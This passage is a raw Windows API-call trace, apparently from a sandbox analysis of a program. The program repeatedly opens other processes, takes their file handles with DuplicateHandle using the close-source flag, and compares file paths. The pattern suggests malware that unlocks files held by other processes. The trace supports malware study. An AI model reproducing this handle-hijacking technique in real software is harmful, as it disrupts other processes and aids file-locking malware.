hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.783] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.784] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.784] CloseHandle (hObject=0x1e4) returned 1 [0164.784] CloseHandle (hObject=0x194) returned 1 [0164.784] CloseHandle (hObject=0x1e8) returned 1 [0164.784] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0164.784] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.785] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.786] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.786] CloseHandle (hObject=0x1e4) returned 1 [0164.786] CloseHandle (hObject=0x194) returned 1 [0164.786] CloseHandle (hObject=0x1e8) returned 1 [0164.786] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0164.786] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.786] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.787] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.787] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.787] CloseHandle (hObject=0x1e4) returned 1 [0164.787] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.788] CloseHandle (hObject=0x194) returned 1 [0164.788] CloseHandle (hObject=0x1e8) returned 1 [0164.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0164.788] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x0) returned 0 [0164.788] CloseHandle (hObject=0x1e8) returned 1 [0164.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.788] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.788] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.789] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.789] CloseHandle (hObject=0x1e4) returned 1 [0164.789] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.789] CloseHandle (hObject=0x194) returned 1 [0164.789] CloseHandle (hObject=0x1e8) returned 1 [0164.790] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.790] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.795] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.797] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.797] CloseHandle (hObject=0x1e4) returned 1 [0164.798] CloseHandle (hObject=0x194) returned 1 [0164.798] CloseHandle (hObject=0x1e8) returned 1 [0164.798] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.798] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.798] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.798] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.799] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.799] CloseHandle (hObject=0x1e4) returned 1 [0164.799] CloseHandle (hObject=0x194) returned 1 [0164.799] CloseHandle (hObject=0x1e8) returned 1 [0164.800] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.800] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.800] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.801] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.801] CloseHandle (hObject=0x1e4) returned 1 [0164.801] CloseHandle (hObject=0x194) returned 1 [0164.801] CloseHandle (hObject=0x1e8) returned 1 [0164.801] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.801] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.802] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.803] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.803] CloseHandle (hObject=0x1e4) returned 1 [0164.803] CloseHandle (hObject=0x194) returned 1 [0164.803] CloseHandle (hObject=0x1e8) returned 1 [0164.804] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.804] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.804] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.805] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.805] CloseHandle (hObject=0x1e4) returned 1 [0164.805] CloseHandle (hObject=0x194) returned 1 [0164.805] CloseHandle (hObject=0x1e8) returned 1 [0164.805] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.805] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.806] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.807] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.807] CloseHandle (hObject=0x1e4) returned 1 [0164.807] CloseHandle (hObject=0x194) returned 1 [0164.807] CloseHandle (hObject=0x1e8) returned 1 [0164.807] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.807] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.808] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.809] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.809] CloseHandle (hObject=0x1e4) returned 1 [0164.809] CloseHandle (hObject=0x194) returned 1 [0164.809] CloseHandle (hObject=0x1e8) returned 1 [0164.809] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.809] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.810] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.811] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.811] CloseHandle (hObject=0x1e4) returned 1 [0164.811] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0164.811] CloseHandle (hObject=0x194) returned 1 [0164.811] CloseHandle (hObject=0x1e8) returned 1 [0164.811] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.811] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.811] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.812] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.813] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.813] CloseHandle (hObject=0x1e4) returned 1 [0164.813] CloseHandle (hObject=0x194) returned 1 [0164.813] CloseHandle (hObject=0x1e8) returned 1 [0164.813] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.814] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.814] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.814] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.815] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.815] CloseHandle (hObject=0x1e4) returned 1 [0164.816] CloseHandle (hObject=0x194) returned 1 [0164.816] CloseHandle (hObject=0x1e8) returned 1 [0164.816] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e8 [0164.816] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.817] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.817] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.818] CloseHandle (hObject=0x1e4) returned 1 [0164.818] CloseHandle (hObject=0x194) returned 1 [0164.818] CloseHandle (hObject=0x1e8) returned 1 [0164.818] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0164.818] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.818] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.819] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.819] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.820] CloseHandle (hObject=0x1e4) returned 1 [0164.820] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.820] CloseHandle (hObject=0x194) returned 1 [0164.820] CloseHandle (hObject=0x1e8) returned 1 [0164.820] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0164.820] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.820] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.821] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.821] CloseHandle (hObject=0x1e4) returned 1 [0164.821] CloseHandle (hObject=0x194) returned 1 [0164.822] CloseHandle (hObject=0x1e8) returned 1 [0164.822] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0164.822] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.823] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.823] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.823] CloseHandle (hObject=0x1e4) returned 1 [0164.823] CloseHandle (hObject=0x194) returned 1 [0164.824] CloseHandle (hObject=0x1e8) returned 1 [0164.824] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0164.824] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.824] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.824] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.825] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.825] CloseHandle (hObject=0x1e4) returned 1 [0164.825] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.825] CloseHandle (hObject=0x194) returned 1 [0164.826] CloseHandle (hObject=0x1e8) returned 1 [0164.826] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e8 [0164.826] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.827] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.827] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.828] CloseHandle (hObject=0x1e4) returned 1 [0164.828] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.828] CloseHandle (hObject=0x194) returned 1 [0164.828] CloseHandle (hObject=0x1e8) returned 1 [0164.828] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0164.828] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.829] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.829] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.830] CloseHandle (hObject=0x1e4) returned 1 [0164.830] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.830] CloseHandle (hObject=0x194) returned 1 [0164.830] CloseHandle (hObject=0x1e8) returned 1 [0164.830] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x1e8 [0164.830] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.831] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.831] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.831] CloseHandle (hObject=0x1e4) returned 1 [0164.831] CloseHandle (hObject=0x194) returned 1 [0164.832] CloseHandle (hObject=0x1e8) returned 1 [0164.832] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0164.832] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.832] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.832] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.833] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.833] CloseHandle (hObject=0x1e4) returned 1 [0164.833] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.833] CloseHandle (hObject=0x194) returned 1 [0164.833] CloseHandle (hObject=0x1e8) returned 1 [0164.833] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x360) returned 0x1e8 [0164.833] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.834] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.835] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.835] CloseHandle (hObject=0x1e4) returned 1 [0164.835] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.835] CloseHandle (hObject=0x194) returned 1 [0164.835] CloseHandle (hObject=0x1e8) returned 1 [0164.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0164.836] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.836] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.837] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.837] CloseHandle (hObject=0x1e4) returned 1 [0164.837] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.837] CloseHandle (hObject=0x194) returned 1 [0164.837] CloseHandle (hObject=0x1e8) returned 1 [0164.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6f4) returned 0x1e8 [0164.838] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.838] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.838] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.839] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.839] CloseHandle (hObject=0x1e4) returned 1 [0164.839] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.839] CloseHandle (hObject=0x194) returned 1 [0164.840] CloseHandle (hObject=0x1e8) returned 1 [0164.840] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0164.840] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.840] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.844] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.848] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.848] CloseHandle (hObject=0x1e4) returned 1 [0164.848] 